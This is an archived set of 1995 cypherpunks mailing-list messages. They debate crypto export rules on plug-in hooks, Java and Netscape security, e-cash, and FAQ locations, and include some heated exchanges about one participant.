This is a very interesting area for me, and I used to write extensively
about it. Nick Szabo and I had several debates about this, a couple of
years ago. However, no time now to discuss the full implications here.


--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 17 Nov 1995 09:09:25 +0800
To: owner-cypherpunks@toad.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <9511162235.AA18129@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Status: R
>as a compression program, but there's a key difference:  the text
>compressor *doesn't* need a key.

Sure, 12 14 16, etc., bits as in the classic unix compress program.

>The encryption tool would have an interface like
>    Boolean (*)( DataSource, DataSink, void*);
>
>A compressor written to the same interface would never need to touch
>that third argument.  Therefore, the second argument is "specifically
>designed" to permit an encryption tool to be used.

Not at all.  coyping inbuf to output is a common practice, it's quite
rare that you often compress in-place.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 17 Nov 1995 11:11:59 +0800
To: cypherpunks@toad.com
Subject: Re: The Great FAQ Hunt
Message-ID: <acd12714020210047817@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I answer questions about my megabyte-long "Cyphernomicon" FAQ every few
months, so I guess it's that time again.

At 11:19 PM 11/16/95, Cassiel wrote:
>Several fellow newbies have written me asking to share
>the sources I received re: where to get the uncorrupted
>Cypherpunk FAQ (Cyphernomicon).  You can get it uncompressed--
>along with a lot of other cool stuff, like the Applied
>Crypto book--at Pat Farrell's Web Site (thanks, Pat!)
>
>http://www.isse.gmu.edu/~pfarrell/crypto.html
>
>However, when I tried to summon up this 1.2 MB tome with
>Netscape, my computer choked.  Changing the cache settings
>didn't seem to help, so I wound up downloading it via FTP
>from
>
>ftp.netcom.com /pub/tc/tcmay
>
>where you can also get your hands on the shorter MFAQ (Most
>Frequently Asked Questions).

My "Cyphernomicon" FAQ, and various shorter and compressed versions, are
available, actually, in several places.

The site I tell people about most often is Jonathan Rochkind's excellent
HTML version at the URL: http://www.oberlin.edu/~brchkind/cyphernomicon/

I recommend that people use their browsers to read it at this URL. To those
who want to download the whole thing and print it out, I have one question:
"Are you on drugs?" (I have gotten complaints from people who tried to
print it out and gave up after 200 pages, somehow blaming me for it being
too long. Use computerized search tools!)

Searching for "Cyphernomicon" with InfoSeek, Excite, Lycos, or other search
tools will show numerous places it may be found.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Sun, 19 Nov 1995 08:57:45 +0800
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <Pine.SOL.3.91.951116161656.19526G-100000@chivalry>
Message-ID: <9511170143.AA07316@doom>
MIME-Version: 1.0
Content-Type: text/plain



> On Thu, 16 Nov 1995, Scott Brickner wrote:
> > 
> > You'd need a program which not only *accepted* the additional parameter,
> > but also *needed* the second parameter.  I confess I have some difficulty
> > thinking of one.
> 
> It's not too hard to think of a compression scheme that needs extra 
> information to be passed from client to server; the obvious example is 
> some sort of dictionary compression with external dictionaries (can be 
> very effective for short messages where LZW etc never get a chance to get 
> going). 
> 
> Another, more likely case, is where the object could have been compressed 
> by several schemes, and a scheme ID is needed to determine which 
> alogorithm to use. 

But the problem is more on the application side than on the library
side.  If necessary, you can simply design the plug-in crypto function
to regard the first n bytes of the input buffer as a key.  On the
other hand, how do you explain why your application (for which you're
seeking export approval) is generating keys in the first place?  And
what's this other piece of code over here that just sits around and
captures mouse movements at random intervals? :)

   - Mark -


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjs@netcom.com (cjs)
Date: Fri, 17 Nov 1995 11:25:40 +0800
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Java & Netscape security (reply to misc. postings)
In-Reply-To: <9511162108.AA08466@all.net>
Message-ID: <199511170156.RAA17754@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I keep telling you people.. if you keep giving Fred the attention, he
is never going to go away. Its blindingly obvious that he doesn't know
his ass from a hole in the ground, but if you keep telling him that,
its just going to encourage to post more, post more frequently, and
make a bigger fool of himself then he already has. Just ignore
everything he says. Make a proc-mail script to send his mails to
/dev/null or sends them through the text-to-hick filter. But whatever
you do, do *not* send him money, do *not* feed him, and *never* *ever*
no matter how much he begs, nt matter how much he pleads, *NEVER*
reply to this man's messages.

We need one of those little posters like the "Do not takes checks from
this man" ones in the grocery store.

Christopher

> > 3.  Postscript considered dangerous:   (insert-smiley) 
> > 
> > As for the question of someone invoking a postscript interpreter via a
> > browser and thus opening up their system to some rogue postscript
> > file: I think it would be great if either of these two things were to
> > magically happen:
> > 
> > 	1) people would stop putting postscript docs on web pages
> > 	because it's the wrong technology for WWW - it wastes
> > 	bandwidth - it's hard to view & hence often ugly - everyone
> > 	just prints it out anyway and then complains because there
> > 	is no one "standard" implementation of postscript printing
> > 	worldwide and there are dozens of minor problems
> > 
> > 	2) someone could implement a secure postscript previewer
> > 	(whatever that means!) 
> > 
> > I doubt either of those two things will happen.  The average Jo on the
> > internet needs to understand that when s/he downloads binary files
> > over the internet and run them from insecure programs on their local
> > computer, well, s/he runs some risk.  This risk might be tiny, but
> > it's impossible to quantify loss.  If I lose a poem that I'm writing,
> > to me that's priceless, so I do not intend to imply that loss of data
> > isn't tragic for the person who loses it.  If you have data you can't
> > bear to lose, be sure to practice safe computing.  Perform backups
> > regularly, and use judgement about which interpreters and executable
> > programs you allow to run on your PC.
> > 
> > Marianne
> 
> It seems clear from this that Netscape, or at least Marianne who seems
> to speak for Netscpe, doesn't understand the protection issues that my
> clients face.  I will nevertheless forward this official Netscape line
> to them so they can better understand why I tell them it is insecure.
> 
> -- 
> -> See: Info-Sec Heaven at URL http://all.net/
> Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sat, 18 Nov 1995 09:31:27 +0800
To: cypherpunks@toad.com
Subject: [BOOK] "SPYWORLD" (was: Re: CSE gets flak on TV)
Message-ID: <v03003d00acd17b14cfc4@[129.46.82.80]>
MIME-Version: 1.0
Content-Type: text/plain


In Reply to the Message wherein it was written:
>On Tue, 14 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:
>
>>  Electronic snooping part of the game
>>
>>  OTTAWA (CP)--Intelligence experts say it's no big secret that Canada's
>>  high-tech spy agency snoops on friendly countries for financial gain.
>
>No big secret??  It was news to me. ;-)                        [elided]

Dear Alice,

To the few on the list who have not already had the pleasure, I'd put
"SPYWORLD" in the "Puzzle Palace" category of must-reads. Before recently
leaving our own Wunderland for a course in advanced bird-watching off in
the Canary Islands, Michael Sattler was kind enough to loan me his
hardcover of this pithy little 1994 history/expose on the Canadian spook
community by one of their first key propeller-heads, "Mike Frost." After
being unceremoniously dumped by the Canucks a few years back, he decided to
"share" about it all to work out his frustrations. Though I assume it was
'tidied up' by various government censors in pre-publication, and according
to the inside page was printed and "bound in the U.S.A." ;), I must say it
was nevertheless an arousing read, albeit a bit nit-sloppy with the ghost
writing/editing here and there.

It paints a colorful picture of the TLA gang-bang that resulted in the
conception of the Canadian black budget intercept operations. The potent
schtuppingvermachen of the American and British, each waiting patiently for
sloppy seconds is, to say the least, pruriently fascinating. "Frost"
manages to (un)cover, in pleasurably lurid detail, some of the tools used,
and policies openly violated, during such intercepts as "Stephanie" in
Moscow. There are even some descriptions of the scenes behind the green
doors of the NSA and CIA. Frankly, all it really lacks is a nude picture of
the American Ambassador in Ottowa pulling his pants up _before_ drawing the
shades for the last time. If you do read it, use protection.  ;)

"SPYWORLD"
 Subtitle: Inside the Canadian and American Intelligence Establishments
 By: "Mike Frost" as told to Michel Gratton
 ISBN 0-385-25494-6
Publisher:
 Doubleday Canada Ltd.
 105 Bond Street
 Toronto, Ontario
 M5B 1Y3


   dave

PS: Don't worry, Mike, none of the pages stick together. :)


_______________________________________________________________________
"If you're ever robbed of your virtue, trust me: it was an inside job."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Fri, 17 Nov 1995 11:40:03 +0800
To: mrm@netcom.com (Marianne Mueller)
Subject: Re: Java & Netscape security  [NOISE]
In-Reply-To: <9511162108.AA08466@all.net>
Message-ID: <9511161831.ZM14572@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Nov 16,  4:08pm, Dr. Frederick B. Cohen wrote:
> Subject: Re: Java & Netscape security (reply to misc. postings)
> > 3.  Postscript considered dangerous:   (insert-smiley)
> It seems clear from this that Netscape, or at least Marianne who seems
> to speak for Netscpe, doesn't understand the protection issues that my
> clients face.  I will nevertheless forward this official Netscape line
> to them so they can better understand why I tell them it is insecure.

Alright. I've lurked on this one-man issue long enough. The latest attack
was severely lacking in clue. Had Dr. Fred bothered to read EVEN the
.sig file, he *might* have noticed that Marianne works for SUN [three
letters], not Netscape [eight letters].

He *might* have noticed that she was writing from her personal account.

Perhaps Dr. Fred fails to realise that some people *aren't* speaking
for their entire company every time they write e-mail. [see fc.all.net--
i always enjoy pronouncing that nearly phonetically]

Dr. Fred will forward this `official Netscape line' to Netscape,
probably with the similar lack of proper attribution or recognition
of context. We can hope that the receiving end of Netscape possesses at
least those few cluons more which are required realise how far off
*anything* Dr. Fred is now writing.

To have some slight cpunks relevance, I will weigh in on the side of
`It's not X's responsibility to ensure that Y's software isn't broken.'
{for all X, Y in {software developers}} Why? For the same reason that
I'm not generally held accountable for, say, Gary Jeffer's opinions
or Tim May's: because I don't have any control over them.

richard

- --
Richard Martin                           I DON'T SPEAK FOR ALIAS|WAVEFRONT
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKvJkB1gtCYLvIJ1AQF0kwP9E1WZCflbNqGXBaOv1ipTiJdTHjB52aSy
YPhBmTBVKM/FsjekDY0nBmAOsZsj/ak/aUTnkUF5BayMv4dm9yBYb2uc6ow3molK
ijLKqbTnPJtNqQvr7VQZZqFvMwxaBxiyWvHp5ccVCIRXTJV/++YRPbx0dqJvnVMW
CytvDDJ2944=
=ZWg+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Fri, 17 Nov 1995 11:47:12 +0800
To: Philip Nesser <pjnesser@ns.Rocket.Com>
Subject: Re: primality code
In-Reply-To: <9511161826.AA10763@asgaard.rocket.com>
Message-ID: <Pine.SUN.3.91.951116182725.4040C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 16 Nov 1995, Philip Nesser wrote:

> Can someone point me in the right direction for any archives of code to do
> primality testing?  I would rather not have to right something from
> scratch.

You may want to try my Crypto++, which includes, among other things, a 
bignum package and an implementation of the Rabin-Miller compositeness test.

See http://www.eskimo.com/~weidai/cryptlib.html for more information.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Sat, 18 Nov 1995 06:46:12 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <m0tGGn7-0008x9C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Thu, 16 Nov 1995, Scott Brickner wrote:
>> 
>> You'd need a program which not only *accepted* the additional parameter,
>> but also *needed* the second parameter.  I confess I have some difficulty
>> thinking of one.
>
>It's not too hard to think of a compression scheme that needs extra 
>information to be passed from client to server; the obvious example is 
>some sort of dictionary compression with external dictionaries (can be 
>very effective for short messages where LZW etc never get a chance to get 
>going). 
>
>Another, more likely case, is where the object could have been compressed 
>by several schemes, and a scheme ID is needed to determine which 
>alogorithm to use. 
>
>The real issue would appear to be intent, though. If it's obvious that 
>the real intention for the hook is to allow encryption to be added, 
>the State department can jump on it. 

I'm not a programmer, but it seems to me that if the goal is to minimize the
"obviousness" of the provision for cryptography, the calling program could
call the called program (which might be an encryption program, maybe not)
and ask for a text header that is to be listed in a Windows-type window.
Thus, the calling program would not have any references to "encryption" or
"key" in its program or documentation; it would get that the first time it
calls the called program.  

BTW, one function which obviously  needs an additional argument to work is a
CRC program, in which the particular polynomial to be used must be
specified.  And I guess that a CRC is basically the same type of thing as a
hash function, too.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: szabo@netcom.com (Nick Szabo)
Date: Fri, 17 Nov 1995 12:51:37 +0800
To: cypherpunks@toad.com
Subject: Security via Sounding Impressive
Message-ID: <199511170351.TAA26249@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I've notice an interesting pattern in how security mechanisms are named.
On the one hand, we have some security features with very impressive sounding
names:

Certification *Authority*
*Authorization*
*Trusted* Server
*Master* Key
etc.

These words fill most people (many on this list are exceptions)
with awe and good will towards the feature so named. They also 
make good channel markers, pointing out the _insecure_ parts 
of the system.  The effect is to cover up the lack or inadequecy 
of a mechanism with invocations that put your brain to sleep. This 
is quite lucrative for marketing purposes, but it works on
many designers of security features as well!

On the other hand, when we isolate the actual mechanisms of a system
are in fact  mathematically secure, we get names like:
 
Encryption
Blinding
Message Digest
Mix
Capability

These are just plain, boring words, with no connotation that we should
trust them like we trust our big brother.  They just work.
 
Nick Szabo					szabo@netcom.com
Internet Commerce & Security consulting -- e-mail for details




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rthomas@pamd.cig.mot.com (Robert Owen Thomas)
Date: Fri, 17 Nov 1995 11:40:55 +0800
To: rmartin@aw.sgi.com (Richard Martin)
Subject: Re: Java & Netscape security  [NOISE]
In-Reply-To: <9511170006.AA17075@all.net>
Message-ID: <9511162017.ZM29217@pamd.cig.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


*sigh* yet another rambling non-sequitur from Dr. Fred.  time to re-activate
my kill-file...
--

o  Robert Owen Thomas:  Corvette pilot. Cymro ydw i. User scratching post.  o
o       E-mail: Robert.Thomas@pamd.cig.mot.com --or-- robt@Cymru.COM        o
o               Vox:  708.435.7076   Fax:  708.435.7360                     o
o        "When I die, I want to go sleeping like my grandfather...          o
o              Not screaming like the passengers in his car."               o




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wiltship@iccu6.ipswich.gil.com.au (PeterWiltshire)
Date: Thu, 16 Nov 1995 18:33:23 +0800
To: cypherpunks@toad.com
Subject: Re: credit card conventional wisdom
Message-ID: <199511161019.VAA16813@iccu6.ipswich.gil.com.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Gidday Greg

You wrote..
>Most consumer-level transactions are based on a general sort of 
>trust-in-human-nature sort of policy, backed up by the knowledge that a single
>failed transaction (or even a constant low level of failed transactions, where
>failed == "didn't get paid but gave the stuff away") isn't likely to kill off
>a business or even make it unprofitable.

Failed transactions are more likely to affect consumer confidence than
trader confidence.  I have yet to find a site on the net where goods are
shipped before receiving payment, therefore the 'at risk' party is the
buyer. Cybertraders will need to establish a level of credibility and
reliability on a par with their terrestrial cousins.  Cyberbuyers will need
to be confident in their ability to call upon yet unwritten international
laws to gain a refund or replacement when goods and services don't arrive as
advertised.

BTW do you want to buy a really big rock way out in the middle of nowhere?  [:>)

cheers

Peter

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKsP0uvjRao+WEx9AQGq5wP9EicYrEbW3wDoLZ8FcPSvp9b9qk3GhoQH
H7pmHq3OvXr++DZHZqqzL2whvz24BvEA4DQ0mwPa1Te9EtIn/VGqbdv2UO23iI9H
ysGX80T3wokORgKay157KC70aykgiafpHYb0t+hQxClN2FY/jTA5FiheGTaNERQc
UkhP+wOg7zY=
=qewX
-----END PGP SIGNATURE-----







                                             Flight to Quality
                                 Wiltshire Productions Pty Ltd
                              Brisbane, Queensland, Australia
               Intl Voice  61 7 3376 3535  Intl Fax  61 7 3279 4027
              Email wiltship@gil.com.au  PGP Key ID 3E584C7D
  PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Fri, 17 Nov 1995 10:56:01 +0800
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Java & Netscape security  [NOISE]
In-Reply-To: <9511170006.AA17075@all.net>
Message-ID: <9511162021.ZM15853@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


We see enough press releases around here that we can recognise pronouncements
from the mouth of a computer company and those from individuals who happen
to work for a company.

On Nov 16,  7:06pm, Dr. Frederick B. Cohen wrote:
> 	So your claim is that Unix is perfectly secure for networking,
> because without inetd, sendmail, ident daemon, HTTP daemons, syslogd,
> and all those other add-on software pieces, if your users act perfectly
> and nobody ever makes a mistake, you are safe from known attacks.

Nope. Claim is roughly along the lines of, unix is incredibly insecure
for networking, because of inetd, sendmail, ident, httpd ... but *if*
there's a bug in sendmail, the trouble is not with the poor sod who
put file access into the kernel, and definitely not with the person
who wrote pine--even though pine calls sendmail.

> [summary of rest: postscript bad]

As you finally concluded, the problem is the web browser. I concede that
a web browser is a security hole by its very nature in that it makes it
a lot easier for anyone to grab anything from anywhere. (This is also
why web browsers would be unpopular with censors, if censors thought they
could get anywhere by arguing against web browsers instead of sites.)

Since you've now stated that the web browser is wrong and evil and bad,
perhaps it's time you explained your fix for the web browser. The
millions of users, even if they *aren't* the problem, even if they *are*
blameless for blindly accepting anything anyone sends them, even if they
are faultless to ignore any notes on security or care which come with web
browsers--despite all of this--will still want something like a web browser.

Your argument seems to be running to "users are stupid", but it's the
developer's fault that users are stupid, and the developer should protect
the user in all cases from their own stupidity.

People shouldn't make web browsers, because web browsers, in untrained hands,
can damage computers.
People shouldn't make guns, because guns, in untrained hands, can damage
computers.

I would say that connectivity is risk, and that those who want connectivity
must weigh those risks. I think most people weigh the risks of Netscape
et al. and say, "the benefits offset the risks."

richard

[web browsers don't destroy hard drives, numbskulls with mice do]

- --
Richard Martin                           I DON'T SPEAK FOR ALIAS|WAVEFRONT
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKvjYx1gtCYLvIJ1AQEjawP/WQh2UW4zDJpwQvObG1FLBGWwXZx0tV9S
EnkUCRJfqQvaDUWRuyKdyjffYIiwthbCUPyblLcNtj608b1skyledUm7ZNGRsn3m
F+nJ8CNLU7MFhPIiknY5HvjiNE+LCgLibIZRg4LfGAJ2cEScDBOq5JFp8E/9NycX
xUSIVSCVP3g=
=1Q1b
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 17 Nov 1995 13:06:55 +0800
To: mrm@netcom.com (Marianne Mueller)
Subject: Re: Java & Netscape security (reply to misc. postings)
Message-ID: <199511170439.UAA19926@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


After reading http://java.sun.com/1.0alpha3/doc/security/security.html my
(possibly faulty) understanding of Java security is that it will not allow
an applet to speak to IP addresses other than the one it was loaded from. 
I have a question:

Doesn't restriction this prevent an applet from checking some ecash it has
just received for validity with a bank computer?

Thanks - Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 19 Nov 1995 11:58:33 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: e$: Come aaaannnndddd Get it!
In-Reply-To: <acd0ba0e02021004a15b@[205.199.118.202]>
Message-ID: <199511170520.VAA28087@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 3. The success of BankAmericard (later renamed Visa) came when real
> customers and real shops started to use it, not when early pioneers set
> themselves up as clearinghouses and whatnot.

	I'm sorry, but Community ConneXion is a real shop, with real
customers, selling real services, and we accept ecash. 

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 17 Nov 1995 11:50:08 +0800
To: tms@TIS.COM (Thomas M. Swiss)
Subject: Re: MED_vac
In-Reply-To: <199511152004.PAA05104@ziggy.tis.com>
Message-ID: <199511170243.VAA06078@homeport.org>
MIME-Version: 1.0
Content-Type: text


	If you have some personal data that includes your patient
number, why not have a card that instead lists your important data?
"This patient is diabetic, alergic to amoxicillin, and has Gold Cross
insurance." 

	The amount of important data that an ER needs is small.  There
is small benefit to building a huge infrastructure to get that data
carted around.  Also, in ERs, the computers are often authorized the
same way everything else is: a nurse will tell you to leave if you
don't belong there.

	At Defcon, Bruce Schneier was talking about the value stored
in casino chips.  Its sttaggering.  Its an alternate cash system, with
a huge float, astounding velocity, and very little fraud.  Transaction
costs are low, clearing is instantaneous.  The comparison is fairly
clear.

Adam

Thomas M. Swiss wrote:

|      I very much want hospitals to have fast access to my medical data if
| my broken and bleeding body should come through their door, even if I am
| unconscious and my personal physician cannot be reached. On the other hand,
| I don't want anyone to be snooping through them right now.

|      So, what if my records were available on the net, but encrypted with a
| an key known to my physician and an escrow agency? (Equivalently, they
| could be on that smartcard, but encrypted.) If an emergency occurs, the
| hospital fetches my encrypted records from my physician's server, then
| sends a message (signed with the hospital's key) to Keys R Us, the escrow
| agent, saying "This is Dr. McCoy at Frobnitz Memorial Hospital, we need the
| key for FooBar Medix, Inc., patient number 147258369." (My FooBar Medix,
| Inc., insurance card lists my physician's server, the escrow agency, and my



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: schampeo@imonics.com (Steve Champeon (working from home))
Date: Fri, 17 Nov 1995 12:14:24 +0800
To: "Richard Martin" <rmartin@aw.sgi.com>
Subject: Re: Java & Netscape security  [NOISE]
Message-ID: <v02120d00acd1aa2c9cf1@[205.139.212.66]>
MIME-Version: 1.0
Content-Type: text/plain


<plonk>! I'm so tired of listening to this no-researching,
no-paying-attention, out-to-make-money freak I just can't
stand it. Consider Mr. fc@all.net hereby removed from my
mailbox by virtue of the autofiltering capability of my
lovely mailreader.

Fred: *RTFWP* and stop complaining about things you know
nothing about. Feh.


Steve

--
Steven Champeon                                (919) 469-7833
Technical Lead,                          schampeo@imonics.com
Imonics Web Services                    webmaster@imonics.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 17 Nov 1995 09:25:44 +0800
To: cypherpunks@toad.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <Pine.3.89.9511162243.A5545-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 16 Nov 1995, Scott Brickner wrote:

> You'd need a program which not only *accepted* the additional parameter,
> but also *needed* the second parameter.  I confess I have some difficulty
> thinking of one.

How about command-line compression options. Gzip, for example, allows you
to specify how good you want the compression to be, with better
compression taking longer. So you could justify passing a set of options
to the compression algorithm, which could also be used to pass key 
information to the encryption algorithm. In fact, you could pass in a 
void * pointer to options that had been set up in a preferences panel in 
the application, which would be provided by the plug-in compression or 
encryption code. That structure could then have anything you wanted in it.

Also, I'm not sure you'd need to pass a key, surely the encryption code 
could do all the key-handling itself ?

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 17 Nov 1995 15:06:16 +0800
To: cypherpunks@toad.com
Subject: Re: e$: Come aaaannnndddd Get it!
Message-ID: <acd16c9506021004ccb3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:20 AM 11/17/95, sameer wrote:
>>
>> 3. The success of BankAmericard (later renamed Visa) came when real
>> customers and real shops started to use it, not when early pioneers set
>> themselves up as clearinghouses and whatnot.
>
>        I'm sorry, but Community ConneXion is a real shop, with real
>customers, selling real services, and we accept ecash.

You guys are getting way too sensitive about all this.

I'm in favor of real shops selling real things or real services. My point
was that there is no compelling need to get people to sign up just for
moral support.

Lighten up.

--Tim


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 17 Nov 1995 13:04:14 +0800
To: rmartin@aw.sgi.com (Richard Martin)
Subject: Re: Java & Netscape security  [NOISE]
In-Reply-To: <9511162021.ZM15853@glacius.alias.com>
Message-ID: <9511170355.AA28616@all.net>
MIME-Version: 1.0
Content-Type: text


...
> On Nov 16,  7:06pm, Dr. Frederick B. Cohen wrote:
> > 	So your claim is that Unix is perfectly secure for networking,
> > because without inetd, sendmail, ident daemon, HTTP daemons, syslogd,
> > and all those other add-on software pieces, if your users act perfectly
> > and nobody ever makes a mistake, you are safe from known attacks.
> 
> Nope. Claim is roughly along the lines of, unix is incredibly insecure
> for networking, because of inetd, sendmail, ident, httpd ... but *if*
> there's a bug in sendmail, the trouble is not with the poor sod who
> put file access into the kernel, and definitely not with the person
> who wrote pine--even though pine calls sendmail.

But of course, the sendmail problems are all related to other problems with
Unix, and the common thread to all of the sendmail attacks is Unix, so many
people blame Unix, not sendmail (although I think there is enough blame to
go around).

> > [summary of rest: postscript bad]
> 
> As you finally concluded, the problem is the web browser. I concede that
> a web browser is a security hole by its very nature in that it makes it
> a lot easier for anyone to grab anything from anywhere. (This is also
> why web browsers would be unpopular with censors, if censors thought they
> could get anywhere by arguing against web browsers instead of sites.)

Grabbing anything from anywhere isn't the problem.  The problem is how you
interpret it.  Information only has meaning in that it is interpreted.

> Since you've now stated that the web browser is wrong and evil and bad,
> perhaps it's time you explained your fix for the web browser.

I didn't say wrong, evil, or bad.  I only said insecure.  My complaints
against Netscape and Sun are not that their Web browsers are insecure -
it is that they are selling these browsers based on security.  The
general public, and most of the users in the world, don't percieve the
difference between SSL and Java and secure - they hear that SSL makes
them safe, that Java makes them safe, and they believe it. 

> The
> millions of users, even if they *aren't* the problem, even if they *are*
> blameless for blindly accepting anything anyone sends them, even if they
> are faultless to ignore any notes on security or care which come with web
> browsers--despite all of this--will still want something like a web browser.

It's like selling me a gun and calling it safe because it has a safety on it.
The safety doesn't make a gun safe, it only makes it safer against particular
classes of problems.  Gun sellers don't call guns safe, and neither should
sellers of Web browsers.

> Your argument seems to be running to "users are stupid", but it's the
> developer's fault that users are stupid, and the developer should protect
> the user in all cases from their own stupidity.

If the user claims to provide safety, that should apply to the least
knowledgeable user, not only to the most knowledgeable.  Almost any
system can be operated securely by the most knowledgeable user.  That's
not the market Netscape and Java are aimed toward.

> People shouldn't make web browsers, because web browsers, in untrained hands,
> can damage computers.
> People shouldn't make guns, because guns, in untrained hands, can damage
> computers.

I said neither.  I said that people shouldn't claim that Web browsers
are safe just because they have some safety features.  The same applies
to guns. 

> I would say that connectivity is risk, and that those who want connectivity
> must weigh those risks. I think most people weigh the risks of Netscape
> et al. and say, "the benefits offset the risks."

If that were true, I wouldn't have a real problem with it, but it's not
true.  Most people don't understand the risks.  In fact, even most
people on this list apparently don't understand the risks.  People see
benefits because they pop out at them on the screen.  People only see
risks when they get burned by them and are aware of it.

I think that very few people weigh the risks of Netscape/HotJava because
almost nobody is even aware of them.  Of the people that do weigh the
risks, many of them listen to people who say that Netscape/Java is
secure.  Very few of them pay real attention to the details of what is
actually claimed about security.

Then we have the people at Netscape/Sun and many of the people on this
list who keep telling people that these products are secure.  We hear
again and again that they should blame any negative results of using
these products on their users and the copy of ghostscript or postscript
